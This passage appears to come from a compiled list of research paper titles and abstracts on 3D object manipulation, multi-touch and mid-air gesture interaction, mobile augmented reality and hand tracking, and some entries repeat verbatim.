this, we propose a new multimodal approach for intuitive visualization of forensic data and evaluate its feasibility. --- paper_title: A Survey of Augmented Reality paper_content: This paper surveys the field of augmented reality AR, in which 3D virtual objects are integrated into a 3D real environment in real time. It describes the medical, manufacturing, visualization, path planning, entertainment, and military applications that have been explored. This paper describes the characteristics of augmented reality systems, including a detailed discussion of the tradeoffs between optical and video blending approaches. Registration and sensing errors are two of the biggest problems in building effective augmented reality systems, so this paper summarizes current efforts to overcome these problems. Future directions and areas requiring further research are discussed. This survey provides a starting point for anyone interested in researching or using augmented reality. --- paper_title: A Novel Multi-touch Approach for 3D Object Free Manipulation paper_content: In the field of scientific visualization, 3D manipulation is a fundamental task for many different scientific datasets, such as particle data in physics and astronomy, fluid data in aerography, and structured data in medical science. Current researches show that large multi-touch interactive displays serve as a promising device providing numerous significant advantages for displaying and manipulating scientific data. Those benefits of direct-touch devices motivate us to use touch-based interaction techniques to explore scientific 3D data. However, manipulating object in 3D space via 2D touch input devices is challenging for precise control. Therefore, we present a novel multi-touch approach for manipulating structured objects in 3D visualization space, based on multi-touch gestures and an extra axis for the assistance. Our method supports 7-DOF manipulations. Moreover, with the help from the extra axis and depth hints, users can have better control of the interactions. We report on a user study to make comparisons between our method and standard mouse-based 2D interface. We show in this work that touch-based interactive displays can be more effective when applied to complex problems if the interactive visualizations and interactions are designed appropriately. --- paper_title: SmartSkin: an infrastructure for freehand manipulation on interactive surfaces paper_content: This paper introduces a new sensor architecture for making interactive surfaces that are sensitive to human hand and finger gestures. This sensor recognizes multiple hand positions and shapes and calculates the distance between the hand and the surface by using capacitive sensing and a mesh-shaped antenna. In contrast to camera-based gesture recognition systems, all sensing elements can be integrated within the surface, and this method does not suffer from lighting and occlusion problems. This paper describes the sensor architecture, as well as two working prototype systems: a table-size system and a tablet-size system. It also describes several interaction techniques that would be difficult to perform without using this architecture --- paper_title: tBox: a 3d transformation widget designed for touch-screens paper_content: 3D transformation widgets are commonly used in many 3D applications operated from mice and keyboards. These user interfaces allow independent control of translations, rotations, and scaling for manipulation of 3D objects. In this paper, we study how these widgets can be adapted to the tactile paradigm. We have explored an approach where users apply rotations by means of physically plausible gestures, and we have extended successful 2D tactile principles to the context of 3D interaction. These investigations led to the design of a new 3D transformation widget, tBox, that can been operated easily and efficiently from gestures on touch-screens. --- paper_title: Rotation and translation mechanisms for tabletop interaction paper_content: A digital tabletop offers several advantages over other groupware form factors for collaborative applications. However, users of a tabletop system do not share a common perspective for the display of information: what is presented right side up to one participant is upside down for another. In this paper, we survey five different rotation and translation techniques for objects displayed on a direct touch digital tabletop display. We analyze their suitability for interactive tabletops in light of their respective input and output degrees of freedom, as well as the precision and completeness provided by each. We describe various tradeoffs that arise when considering which, when and where each of these techniques might be most useful. --- paper_title: The design and evaluation of 3D positioning techniques for multi-touch displays paper_content: Multi-touch displays represent a promising technology for the display and manipulation of 3D data. To fully exploit their capabilities, appropriate interaction techniques must be designed. In this paper, we explore the design of free 3D positioning techniques for multi-touch displays to exploit the additional degrees of freedom provided by this technology. Our contribution is two-fold: first we present an interaction technique to extend the standard four view-ports technique found in commercial CAD applications, and second we introduce a technique designed to allow free 3D positioning with a single view of the scene. The two techniques were evaluated in a preliminary experiment. The first results incline us to conclude that the two techniques are equivalent in term of performance showing that the Z-technique provides a real alternative to the statu quo viewport technique. --- paper_title: A screen-space formulation for 2D and 3D direct manipulation paper_content: Rotate-Scale-Translate (RST) interactions have become the de facto standard when interacting with two-dimensional (2D) contexts in single-touch and multi-touch environments. Because the use of RST has thus far focused almost entirely on 2D, there are not yet standard techniques for extending these principles into three dimensions. In this paper we describe a screen-space method which fully captures the semantics of the traditional 2D RST multi-touch interaction, but also allows us to extend these same principles into three-dimensional (3D) interaction. Just like RST allows users to directly manipulate 2D contexts with two or more points, our method allows the user to directly manipulate 3D objects with three or more points. We show some novel interactions, which take perspective into account and are thus not available in orthographic environments. Furthermore, we identify key ambiguities and unexpected behaviors that arise when performing direct manipulation in 3D and offer solutions to mitigate the difficulties each presents. Finally, we show how to extend our method to meet application-specific control objectives, as well as show our method working in some example environments. --- paper_title: Two-Finger Gestures for 6DOF Manipulation of 3D Objects paper_content: Multitouch input devices afford effective solutions for 6DOF (six Degrees of Freedom) manipulation of 3D objects. Mainly focusing on large-size multitouch screens, existing solutions typically require at least three fingers and bimanual interaction for full 6DOF manipulation. However, single-hand, two-finger operations are preferred especially for portable multitouch devices (e.g., popular smartphones) to cause less hand occlusion and relieve the other hand for necessary tasks like holding the devices. Our key idea for full 6DOF control using only two contact fingers is to introduce two manipulation modes and two corresponding gestures by examining the moving characteristics of the two fingers, instead of the number of fingers or the directness of individual fingers as done in previous works. We solve the resulting binary classification problem using a learning-based approach. Our pilot experiment shows that with only two contact fingers and typically unimanual interaction, our technique is comparable to or even better than the state-of-the-art techniques. © 2012 Wiley Periodicals, Inc. --- paper_title: The structure of object transportation and orientation in human-computer interaction paper_content: An experiment was conducted to investigate the relationship between object transportation and object orientation by the human hand in the context of humancomputer interaction (HCI). This work merges two streams of research: the structure of interactive manipulation in HCI and the natural hand prehension in human motor control. It was found that object transportation and object orientation have a parallel, interdependent structure which is generally persistent over different visual feedback conditions. The notion of concurrency and interdependence of multidimensional visuomotor control structure can provide a new framework for human-computer interface evaluation and design. --- paper_title: Integrality and Separability of Multitouch Interaction Techniques in 3D Manipulation Tasks paper_content: Multitouch displays represent a promising technology for the display and manipulation of data. While the manipulation of 2D data has been widely explored, 3D manipulation with multitouch displays remains largely unexplored. Based on an analysis of the integration and separation of degrees of freedom, we propose a taxonomy for 3D manipulation techniques with multitouch displays. Using that taxonomy, we introduce Depth-Separated Screen-Space (DS3), a new 3D manipulation technique based on the separation of translation and rotation. In a controlled experiment, we compared DS3 with Sticky Tools and Screen-Space. Results show that separating the control of translation and rotation significantly affects performance for 3D manipulation, with DS3 performing faster than the two other techniques. --- paper_title: Sticky tools: full 6DOF force-based interaction for multi-touch tables paper_content: Tabletop computing techniques are using physically familiar force-based interactions to enable compelling interfaces that provide a feeling of being embodied with a virtual object. We introduce an interaction paradigm that has the benefits of force-based interaction complete with full 6DOF manipulation. Only multi-touch input, such as that provided by the Microsoft Surface and the SMART Table, is necessary to achieve this interaction freedom. This paradigm is realized through sticky tools: a combination of sticky fingers, a physically familiar technique for moving, spinning, and lifting virtual objects; opposable thumbs, a method for flipping objects over; and virtual tools, a method for propagating behaviour to other virtual objects in the scene. We show how sticky tools can introduce richer meaning to tabletop computing by drawing a parallel between sticky tools and the discussion in Urp [20] around the meaning of tangible devices in terms of nouns, verbs, reconfigurable tools, attributes, and pure objects. We then relate this discussion to other force-based interaction techniques by describing how a designer can introduce complexity in how people can control both physical and virtual objects, how physical objects can control both physical and virtual objects, and how virtual objects can control virtual objects. --- paper_title: Two-finger 3D rotations for novice users: surjective and integral interactions paper_content: Now that 3D interaction is available on tablets and smart phones, it becomes critical to provide efficient 3D interaction techniques for novice users. This paper investigates interaction techniques for 3D rotation with two fingers of a single hand, on multitouch mobile devices. We introduce two new rotation techniques that allow integral control of the 3 axes of rotation. These techniques also satisfy a new criterion that we introduce: surjection. We ran a study to compare the new techniques with two widely used rotation techniques from the literature. Results indicate that surjection and integration lead to a performance improvement of a group of participants who had no prior experience in 3D interaction. Qualitative results also indicate participants' preference for the new interaction techniques. --- paper_title: A one-handed multi-touch mating method for 3d rotations paper_content: Rotating 3D objects is a difficult task. We present a new rotation technique based on collision-free "mating" to expedite 3D rotations. It is specifically designed for one-handed interaction on tablets or touchscreens. A user study found that our new technique decreased the time to rotate objects in 3D by more than 60% in situations where objects align. We found similar results when users translated and rotated objects in a 3D scene. Also, angle errors were 35% less with mating. In essence, our new rotation technique improves both the speed and accuracy of common 3D rotation tasks. --- paper_title: Markerless visual fingertip detection for natural mobile device interaction paper_content: The vision-based detection of hand gestures is one technological enabler for Natural User Interfaces which try to provide a natural and intuitive interaction with computers. In particular, mobile devices might benefit from such a less device-centric but more natural input possibility. In this paper, we introduce our ongoing work on the visual markerless detection of fingertips on mobile devices. Further, we shed light on the potential of mobile hand gesture detection and present several promising use cases and respective demo applications based on the presented engine. --- paper_title: PalmSpace: continuous around-device gestures vs. multitouch for 3D rotation tasks on mobile devices paper_content: Rotating 3D objects is a difficult task on mobile devices, because the task requires 3 degrees of freedom and (multi-)touch input only allows for an indirect mapping. We propose a novel style of mobile interaction based on mid-air gestures in proximity of the device to increase the number of DOFs and alleviate the limitations of touch interaction with mobile devices. While one hand holds the device, the other hand performs mid-air gestures in proximity of the device to control 3D objects on the mobile device's screen. A flat hand pose defines a virtual surface which we refer to as the PalmSpace for precise and intuitive 3D rotations. We constructed several hardware prototypes to test our interface and to simulate possible future mobile devices equipped with depth cameras. We conducted a user study to compare 3D rotation tasks using the most promising two designs for the hand location during interaction -- behind and beside the device -- with the virtual trackball, which is the current state-of-art technique for orientation manipulation on touch-screens. Our results show that both variants of PalmSpace have significantly lower task completion times in comparison to the virtual trackball. --- paper_title: Evaluating RGB+D hand posture detection methods for mobile 3D interaction paper_content: In mobile applications it is crucial to provide intuitive means for 2D and 3D interaction. A large number of techniques exist to support a natural user interface (NUI) by detecting the user's hand posture in RGB+D (depth) data. Depending on a given interaction scenario, each technique has its advantages and disadvantages. To evaluate the performance of the various techniques on a mobile device, we conducted a systematic study by comparing the accuracy of five common posture recognition approaches with varying illumination and background. To be able to perform this study, we developed a powerful software framework that is capable of processing and fusing RGB and depth data directly on a handheld device. Overall results reveal best recognition rate of posture detection for combined RGB+D data at the expense of update rate. Finally, to support users in choosing the appropriate technique for their specific mobile interaction task, we derived guidelines based on our study. --- paper_title: Visual gesture interfaces for virtual environments paper_content: Virtual environments provide a whole new way of viewing and manipulating 3D data. Current technology moves the images out of desktop monitors and into the space immediately surrounding the user. Users can literally put their hands on the virtual objects. Unfortunately techniques for interacting with such environments have yet to mature. Gloves and sensor based trackers are unwieldy, constraining and uncomfortable to use. A natural, more intuitive method of interaction would be to allow the user to grasp objects with their hands and manipulate them as if they were real objects. We are investigating the use of computer vision in implementing a natural interface based on hand gestures. A framework for a gesture recognition system is introduced along with results of experiments in colour segmentation, feature extraction and template matching for finger and hand tracking and hand pose recognition. Progress in the implementation of a gesture interface for navigation and object manipulation in virtual environments is discussed. --- paper_title: Image plane interaction techniques in 3D immersive environments paper_content: This paper presents a set of interaction techniques for use in headtracked immersive virtual environments. With these techniques, the user interacts with the 2D projections that 3D objects in the scene make on his image plane. The desktop analog is the use of a mouse to interact with objects in a 3D scene based on their projections on the monitor screen. Participants in an immersive environment can use the techniques we discuss for object selection, object manipulation, and user navigation in virtual environments. CR Categories and Subject Descriptors: 1.3.6 [Computer Graphics]: Methodology and Techniques - InteractionTechniques; 1.3.7 [Computer Graphics]: Three-Dimensional Graphics and Realism - VirtualReality. Additional Keywords: virtual worlds, virtual environments, navigation, selection, manipulation. --- paper_title: Two-Finger Gestures for 6DOF Manipulation of 3D Objects paper_content: Multitouch input devices afford effective solutions for 6DOF (six Degrees of Freedom) manipulation of 3D objects. Mainly focusing on large-size multitouch screens, existing solutions typically require at least three fingers and bimanual interaction for full 6DOF manipulation. However, single-hand, two-finger operations are preferred especially for portable multitouch devices (e.g., popular smartphones) to cause less hand occlusion and relieve the other hand for necessary tasks like holding the devices. Our key idea for full 6DOF control using only two contact fingers is to introduce two manipulation modes and two corresponding gestures by examining the moving characteristics of the two fingers, instead of the number of fingers or the directness of individual fingers as done in previous works. We solve the resulting binary classification problem using a learning-based approach. Our pilot experiment shows that with only two contact fingers and typically unimanual interaction, our technique is comparable to or even better than the state-of-the-art techniques. © 2012 Wiley Periodicals, Inc. --- paper_title: Integrality and Separability of Multitouch Interaction Techniques in 3D Manipulation Tasks paper_content: Multitouch displays represent a promising technology for the display and manipulation of data. While the manipulation of 2D data has been widely explored, 3D manipulation with multitouch displays remains largely unexplored. Based on an analysis of the integration and separation of degrees of freedom, we propose a taxonomy for 3D manipulation techniques with multitouch displays. Using that taxonomy, we introduce Depth-Separated Screen-Space (DS3), a new 3D manipulation technique based on the separation of translation and rotation. In a controlled experiment, we compared DS3 with Sticky Tools and Screen-Space. Results show that separating the control of translation and rotation significantly affects performance for 3D manipulation, with DS3 performing faster than the two other techniques. --- paper_title: Dual-Finger 3D Interaction Techniques for mobile devices paper_content: Three-dimensional capabilities on mobile devices are increasing, and the interactivity is becoming a key feature of these tools. It is expected that users will actively engage with the 3D content, instead of being passive consumers. Because touch-screens provide a direct means of interaction with 3D content by directly touching and manipulating 3D graphical elements, touch-based interaction is a natural and appealing style of input for 3D applications. However, developing 3D interaction techniques for handheld devices using touch-screens is not a straightforward task. One issue is that when interacting with 3D objects, users occlude the object with their fingers. Furthermore, because the user's finger covers a large area of the screen, the smallest size of the object users can touch is limited. In this paper, we first inspect existing 3D interaction techniques based on their performance with handheld devices. Then, we present a set of precise Dual-Finger 3D Interaction Techniques for a small display. Finally, we present the results of an experimental study, where we evaluate the usability, performance, and error rate of the proposed and existing 3D interaction techniques. --- paper_title: Sticky tools: full 6DOF force-based interaction for multi-touch tables paper_content: Tabletop computing techniques are using physically familiar force-based interactions to enable compelling interfaces that provide a feeling of being embodied with a virtual object. We introduce an interaction paradigm that has the benefits of force-based interaction complete with full 6DOF manipulation. Only multi-touch input, such as that provided by the Microsoft Surface and the SMART Table, is necessary to achieve this interaction freedom. This paradigm is realized through sticky tools: a combination of sticky fingers, a physically familiar technique for moving, spinning, and lifting virtual objects; opposable thumbs, a method for flipping objects over; and virtual tools, a method for propagating behaviour to other virtual objects in the scene. We show how sticky tools can introduce richer meaning to tabletop computing by drawing a parallel between sticky tools and the discussion in Urp [20] around the meaning of tangible devices in terms of nouns, verbs, reconfigurable tools, attributes, and pure objects. We then relate this discussion to other force-based interaction techniques by describing how a designer can introduce complexity in how people can control both physical and virtual objects, how physical objects can control both physical and virtual objects, and how virtual objects can control virtual objects. --- paper_title: Using custom transformation axes for mid-air manipulation of 3D virtual objects paper_content: Virtual Reality environments are able to offer natural interaction metaphors. However, it is difficult to accurately place virtual objects in the desired position and orientation using gestures in mid-air. Previous research concluded that the separation of degrees-of-freedom (DOF) can lead to better results, but these benefits come with an increase in time when performing complex tasks, due to the additional number of transformations required. In this work, we assess whether custom transformation axes can be used to achieve the accuracy of DOF separation without sacrificing completion time. For this, we developed a new manipulation technique, MAiOR, which offers translation and rotation separation, supporting both 3-DOF and 1-DOF manipulations, using personalized axes for the latter. Additionally, it also has direct 6-DOF manipulation for coarse transformations, and scaled object translation for increased placement. We compared MAiOR against an exclusively 6-DOF approach and a widget-based approach with explicit DOF separation. Results show that, contrary to previous research suggestions, single DOF manipulations are not appealing to users. Instead, users favored 3-DOF manipulations above all, while keeping translation and rotation independent. --- paper_title: A Survey of Augmented Reality paper_content: This paper surveys the field of augmented reality AR, in which 3D virtual objects are integrated into a 3D real environment in real time. It describes the medical, manufacturing, visualization, path planning, entertainment, and military applications that have been explored. This paper describes the characteristics of augmented reality systems, including a detailed discussion of the tradeoffs between optical and video blending approaches. Registration and sensing errors are two of the biggest problems in building effective augmented reality systems, so this paper summarizes current efforts to overcome these problems. Future directions and areas requiring further research are discussed. This survey provides a starting point for anyone interested in researching or using augmented reality. --- paper_title: One-handed interaction with augmented virtual objects on mobile devices paper_content: We present a one-handed approach for augmented reality and interaction on mobile devices. The proposed application considers common situations with mobile devices such as when a user's hand holds a mobile device while the other hand is free. It also supports natural augmented reality environment such as when a user interacts with augmented reality contents anytime and anywhere without special equipment such as visual markers or tags. In our approach, a virtual object is augmented on the palm of a user's free hand, as if the virtual object is just sitting on the palm, using a palm pose estimation method. The augmented virtual object reacts (e.g. moving or animation) to motions of the hand such as opening or closing the hand based on fingertip tracking. Moreover, it provides tactile interactions with the virtual object by wearing a tactile glove with vibration sensors. This paper describes how to implement the augmented reality application, and preliminary results show its potential as a new approach to mobile augmented reality interaction. --- paper_title: Combining multi-touch input and device movement for 3D manipulations in mobile augmented reality environments paper_content: Nowadays, handheld devices are capable of displaying augmented environments in which virtual content overlaps reality. To interact with these environments it is necessary to use a manipulation technique. The objective of a manipulation technique is to define how the input data modify the properties of the virtual objects. Current devices have multi-touch screens that can serve as input. Additionally, the position and rotation of the device can also be used as input creating both an opportunity and a design challenge. In this paper we compared three manipulation techniques which namely employ multi-touch, device position and a combination of both. A user evaluation on a docking task revealed that combining multi-touch and device movement yields the best task completion time and efficiency. Nevertheless, using only the device movement and orientation is more intuitive and performs worse only in large rotations. --- paper_title: Shift: a technique for operating pen-based interfaces using touch paper_content: Retrieving the stylus of a pen-based device takes time and requires a second hand. Especially for short intermittent interactions many users therefore choose to use their bare fingers. Although convenient, this increases targeting times and error rates. We argue that the main reasons are the occlusion of the target by the user's finger and ambiguity about which part of the finger defines the selection point. We propose a pointing technique we call Shift that is designed to address these issues. When the user touches the screen, Shift creates a callout showing a copy of the occluded screen area and places it in a non-occluded location. The callout also shows a pointer representing the selection point of the finger. Using this visual feedback, users guide the pointer into the target by moving their finger on the screen surface and commit the target acquisition by lifting the finger. Unlike existing techniques, Shift is only invoked when necessary--over large targets no callout is created and users enjoy the full performance of an unaltered touch screen. We report the results of a user study showing that with Shift participants can select small targets with much lower error rates than an unaided touch screen and that Shift is faster than Offset Cursor for larger targets. --- paper_title: Mobile augmented reality interaction techniques for authoring situated media on-site paper_content: We present a set of mobile augmented reality interaction techniques for authoring situated media: multimedia and hypermedia that are embedded within the physical environment. Our techniques are designed for use with a tracked hand-held tablet display with an attached camera, and rely on "freezing" the frame for later editing. --- paper_title: Napkin sketch: handheld mixed reality 3D sketching paper_content: This paper describes, Napkin Sketch, a 3D sketching interface which attempts to support sketch-based artistic expression in 3D, mimicking some of the qualities of conventional sketching media and tools both in terms of physical properties and interaction experience. A portable tablet PC is used as the sketching platform, and handheld mixed reality techniques are employed to allow 3D sketches to be created on top of a physical napkin. Intuitive manipulation and navigation within the 3D design space is achieved by visually tracking the tablet PC with a camera and mixed reality markers. For artistic expression using sketch input, we improve upon the projective 3D sketching approach with a one stroke sketch plane definition technique. This coupled with the hardware setup produces a natural and fluid sketching experience. --- paper_title: Experiments in 3D interaction for mobile phone AR paper_content: In this paper we present an evaluation of several different techniques for virtual object positioning and rotation on a mobile phone. We compare gesture input captured by the phone's front camera, to tangible input, keypad interaction and phone tilting in increasingly complex positioning and rotation tasks in an AR context. Usability experiments found that tangible input techniques are best for translation tasks, while keypad input is best for rotation tasks. Implications for the design of mobile phone 3D interfaces are presented as well as directions for future research. --- paper_title: Back-of-device interaction allows creating very small touch devices paper_content: In this paper, we explore how to add pointing input capabilities to very small screen devices. On first sight, touchscreens seem to allow for particular compactness, because they integrate input and screen into the same physical space. The opposite is true, however, because the user's fingers occlude contents and prevent precision. We argue that the key to touch-enabling very small devices is to use touch on the device backside. In order to study this, we have created a 2.4" prototype device; we simulate screens smaller than that by masking the screen. We present a user study in which participants completed a pointing task successfully across display sizes when using a back-of device interface. The touchscreen-based control condition (enhanced with the shift technique), in contrast, failed for screen diagonals below 1 inch. We present four form factor concepts based on back-of-device interaction and provide design guidelines extracted from a second user study. --- paper_title: FingARtips: gesture based direct manipulation in Augmented Reality paper_content: This paper presents a technique for natural, fingertip-based interaction with virtual objects in Augmented Reality (AR) environments. We use image processing software and finger- and hand-based fiducial markers to track gestures from the user, stencil buffering to enable the user to see their fingers at all times, and fingertip-based haptic feedback devices to enable the user to feel virtual objects. Unlike previous AR interfaces, this approach allows users to interact with virtual content using natural hand gestures. The paper describes how these techniques were applied in an urban planning interface, and also presents preliminary informal usability results. --- paper_title: Smartphone as an augmented reality authoring tool via multi-touch based 3D interaction method paper_content: In this paper we present an Augmented Reality (AR) authoring tool for smartphones which facilitates intuitive interactions that manipulate the augmented virtual objects in real-time. A novel 3D interaction method using multi-touch interface and camera pose is proposed for intuitive authoring. With the gestures of two fingers on the touch screen, the user can adjust 3 DOF translation and 3 DOF rotation to a selected virtual object. The capabilities of the authoring tool are demonstrated on a smartphone. --- paper_title: Freeze-Set-Go interaction method for handheld mobile augmented reality environments paper_content: Mobile computing devices are getting popular as a platform for augmented reality (AR) application, and efficient interaction methods for mobile AR environments are considered necessary. Recently, touch interfaces are getting popular and drawing attention as a future standard interface on mobile computing devices. However, accurate touch interactions are not that easy in mobile AR environments where users tend to move and viewpoints easily get shaky. In this paper, the authors suggest a new interaction method for handheld mobile AR environments, named 'Freeze-Set-Go'. The proposed interaction method lets users to 'freeze' the real world view tentatively, and continue to manipulate virtual entities within the AR scene. According to the user experiment, the proposed method turns out to be helping users to interact with mobile AR environments using touch interfaces in a more accurate and comfortable way. --- paper_title: Finger tracking for interaction in augmented environments paper_content: Optical tracking systems allow three-dimensional input for virtual environment applications with high precision and without annoying cables. Spontaneous and intuitive interaction is possible through gestures. The authors present a finger tracker that allows gestural interaction and is simple, cheap, fast, robust against occlusion and accurate. It is based on a marked glove, a stereoscopic tracking system and a kinematic 3D model of the human finger. Within our augmented reality application scenario, the user is able to grab, translate, rotate, and release objects in an intuitive way. We demonstrate our tracking system in an augmented reality chess game, allowing a user to interact with virtual objects. --- paper_title: High Precision Touchscreens: Design Strategies and Comparisons with a Mouse paper_content: Abstract Three studies were conducted comparing speed of performance, error rates and user preference ratings for three selection devices. The devices tested were a touchscreen, a touchscreen with stabilization (stabilization software filters and smooths raw data from hardware), and a mouse. The task was the selection of rectangular targets 1, 4, 16 and 32 pixels per side (0·4 × 0·6, 1·7 × 2·2, 6·9 × 9·0, 13·8 × 17·9 mm respectively). Touchscreen users were able to point at single pixel targets, thereby countering widespread expectations of poor touchscreen resolution. The results show no difference in performance between the mouse and touchscreen for targets ranging from 32 to 4 pixels per side. In addition, stabilization significantly reduced the error rates for the touchscreen when selecting small targets. These results imply that touchscreens, when properly used, have attractive advantages in selecting targets as small as 4 pixels per size (approximately one-quarter of the size of a single character). A variant of Fitts' Law is proposed to predict touchscreen pointing times. Ideas for future research are also presented. --- paper_title: Freeze view touch and finger gesture based interaction methods for handheld augmented reality interfaces paper_content: Interaction techniques for handheld mobile Augmented Reality (AR) often focus on device-centric methods based around touch input. However, users may not be able to easily interact with virtual objects in mobile AR scenes if they are holding the handheld device with one hand and touching the screen with the other, while at the same time trying to maintain visual tracking of an AR marker. In this paper we explore novel interaction methods for handheld mobile AR that overcomes this problem. We investigate two different approaches; (1) freeze view touch and (2) finger gesture based interaction. We describe how each method is implemented and present findings from a user experiment comparing virtual object manipulation with these techniques to more traditional touch methods. --- paper_title: Poster: Real-time markerless kinect based finger tracking and hand gesture recognition for HCI paper_content: Hand gestures are intuitive ways to interact with a variety of user interfaces. We developed a real-time finger tracking technique using the Microsoft Kinect as an input device and compared its results with an existing technique that uses the K-curvature algorithm. Our technique calculates feature vectors based on Fourier descriptors of equidistant points chosen on the silhouette of the detected hand and uses template matching to find the best match. Our preliminary results show that our technique performed as well as an existing k-curvature algorithm based finger detection technique. --- paper_title: Interactions in the air: adding further depth to interactive tabletops paper_content: Although interactive surfaces have many unique and compelling qualities, the interactions they support are by their very nature bound to the display surface. In this paper we present a technique for users to seamlessly switch between interacting on the tabletop surface to above it. Our aim is to leverage the space above the surface in combination with the regular tabletop display to allow more intuitive manipulation of digital content in three-dimensions. Our goal is to design a technique that closely resembles the ways we manipulate physical objects in the real-world; conceptually, allowing virtual objects to be 'picked up' off the tabletop surface in order to manipulate their three dimensional position or orientation. We chart the evolution of this technique, implemented on two rear projection-vision tabletops. Both use special projection screen materials to allow sensing at significant depths beyond the display. Existing and new computer vision techniques are used to sense hand gestures and postures above the tabletop, which can be used alongside more familiar multi-touch interactions. Interacting above the surface in this way opens up many interesting challenges. In particular it breaks the direct interaction metaphor that most tabletops afford. We present a novel shadow-based technique to help alleviate this issue. We discuss the strengths and limitations of our technique based on our own observations and initial user feedback, and provide various insights from comparing, and contrasting, our tabletop implementations --- paper_title: DigitEyes: vision-based hand tracking for human-computer interaction paper_content: Computer sensing of hand and limb motion is an important problem for applications in human-computer interaction (HCI), virtual reality, and athletic performance measurement. Commercially available sensors are invasive, and require the user to wear gloves or targets. We have developed a noninvasive vision-based hand tracking system, called DigitEyes. Employing a kinematic hand model, the DigitEyes system has demonstrated tracking performance at speeds of up to 10 Hz, using line and point features extracted from gray scale images of unadorned, unmarked hands. We describe an application of our sensor to a 3D mouse user-interface problem. > --- paper_title: A handle bar metaphor for virtual object manipulation with mid-air interaction paper_content: Commercial 3D scene acquisition systems such as the Microsoft Kinect sensor can reduce the cost barrier of realizing mid-air interaction. However, since it can only sense hand position but not hand orientation robustly, current mid-air interaction methods for 3D virtual object manipulation often require contextual and mode switching to perform translation, rotation, and scaling, thus preventing natural continuous gestural interactions. A novel handle bar metaphor is proposed as an effective visual control metaphor between the user's hand gestures and the corresponding virtual object manipulation operations. It mimics a familiar situation of handling objects that are skewered with a bimanual handle bar. The use of relative 3D motion of the two hands to design the mid-air interaction allows us to provide precise controllability despite the Kinect sensor's low image resolution. A comprehensive repertoire of 3D manipulation operations is proposed to manipulate single objects, perform fast constrained rotation, and pack/align multiple objects along a line. Three user studies were devised to demonstrate the efficacy and intuitiveness of the proposed interaction techniques on different virtual manipulation scenarios. --- paper_title: Real-time hand-tracking with a color glove paper_content: Articulated hand-tracking systems have been widely used in virtual reality but are rarely deployed in consumer applications due to their price and complexity. In this paper, we propose an easy-to-use and inexpensive system that facilitates 3-D articulated user-input using the hands. Our approach uses a single camera to track a hand wearing an ordinary cloth glove that is imprinted with a custom pattern. The pattern is designed to simplify the pose estimation problem, allowing us to employ a nearest-neighbor approach to track hands at interactive rates. We describe several proof-of-concept applications enabled by our system that we hope will provide a foundation for new interactions in modeling, animation control and augmented reality. --- paper_title: Balloon Selection: A Multi-Finger Technique for Accurate Low-Fatigue 3D Selection paper_content: Balloon selection is a 3D interaction technique that is modeled after the real world metaphor of manipulating a helium balloon attached to a string. Balloon selection allows for precise 3D selection in the volume above a tabletop surface by using multiple fingers on a multi-touch-sensitive surface. The 3DOF selection tasks is decomposed in part into a 2DOF positioning task performed by one finger on the tabletop in an absolute 2D Cartesian coordinate system and a 1DOF positioning task performed by another finger on the tabletop in a relative 2D polar coordinate system. We have evaluated balloon selection in a formal user study that compared it to two well-known interaction techniques for selecting a static 3D target: a 3DOF tracked wand and keyboard cursor keys. We found that balloon selection was significantly faster than using cursor keys and had a significantly lower error rate than the wand. The lower error rate appeared to result from the user's hands being supported by the tabletop surface, resulting in significantly reduced hand tremor and arm fatigue. --- paper_title: The Continuous Interaction Space: Interaction Techniques Unifying Touch and Gesture On and Above a Digital Surface paper_content: The rising popularity of digital table surfaces has spawned considerable interest in new interaction techniques. Most interactions fall into one of two modalities: 1) direct touch and multi-touch (by hand and by tangibles) directly on the surface, and 2) hand gestures above the surface. The limitation is that these two modalities ignore the rich interaction space between them. To move beyond this limitation, we first contribute a unification of these discrete interaction modalities called the continuous interaction space. The idea is that many interaction techniques can be developed that go beyond these two modalities, where they can leverage the space between them. That is, we believe that the underlying system should treat the space on and above the surface as a continuum, where a person can use touch, gestures, and tangibles anywhere in the space and naturally move between them. Our second contribution illustrates this, where we introduce a variety of interaction categories that exploit the space between these modalities. For example, with our Extended Continuous Gestures category, a person can start an interaction with a direct touch and drag, then naturally lift off the surface and continue their drag with a hand gesture over the surface. For each interaction category, we implement an example (or use prior work) that illustrates how that technique can be applied. In summary, our primary contribution is to broaden the design space of interaction techniques for digital surfaces, where we populate the continuous interaction space both with concepts and examples that emerge from considering this space as a continuum. --- paper_title: Robust finger tracking with multiple cameras paper_content: This paper gives an overview of a system for robustly tracking the 3D position and orientation of a finger using a few closely spaced cameras. Accurate results are obtained by combining features of stereo range images and color images. This work also provides a design framework for combining multiple sources of information, including stereo range images, color segmentations, shape information and various constraints. This information is used in robust model fitting techniques to track highly over-constrained models of deformable objects: fingers. --- paper_title: Triangle cursor: interactions with objects above the tabletop paper_content: Extending the tabletop display to the third dimension using a stereoscopic projection offers the possibility to improve applications by using the volume above the table surface. The combination of multi-touch input and stereoscopic projection usually requires an indirect technique to interact with objects above the tabletop, as touches can only be detected on the surface. Triangle Cursor is a 3D interaction technique that allows specification of a 3D position and yaw rotation above the interactive tabletop. It was designed to avoid occlusions that disturb the stereoscopic perception. While Triangle Cursor uses an indirect approach, the position, the height above the surface and the yaw rotation can be controlled simultaneously, resulting in a 4 DOF manipulation technique. We have evaluated Triangle Cursor in an initial user study and compared it to a related existing technique in a formal user study. Our experiments show that users were able to perform all tasks significantly faster with our technique without loosing any precision. Most of the subjects considered the technique easy to use and satisfying. --- paper_title: Using Kinect for hand tracking and rendering in wearable haptics paper_content: Wearable haptic devices with poor position sensing are combined with the Kinect depth sensor by Microsoft. A heuristic hand tracker has been developed. It allows for the animation of the hand avatar in the virtual reality and the implementation of the force rendering algorithm: the position of the fingertips is measured by the hand tracker designed and optimized for Kinect, and the rendering algorithm computes the contact forces for wearable haptic display. Preliminary experiments with qualitative results show the effectiveness of the idea of combining Kinect and wearable haptics. --- paper_title: Integrality and Separability of Multitouch Interaction Techniques in 3D Manipulation Tasks paper_content: Multitouch displays represent a promising technology for the display and manipulation of data. While the manipulation of 2D data has been widely explored, 3D manipulation with multitouch displays remains largely unexplored. Based on an analysis of the integration and separation of degrees of freedom, we propose a taxonomy for 3D manipulation techniques with multitouch displays. Using that taxonomy, we introduce Depth-Separated Screen-Space (DS3), a new 3D manipulation technique based on the separation of translation and rotation. In a controlled experiment, we compared DS3 with Sticky Tools and Screen-Space. Results show that separating the control of translation and rotation significantly affects performance for 3D manipulation, with DS3 performing faster than the two other techniques. --- paper_title: Mid-air interactions above stereoscopic interactive tables paper_content: Stereoscopic tabletops offer unique visualization capabilities, enabling users to perceive virtual objects as if they were lying above the surface. While allowing virtual objects to coexist with user actions in the physical world, interaction with these virtual objects above the surface 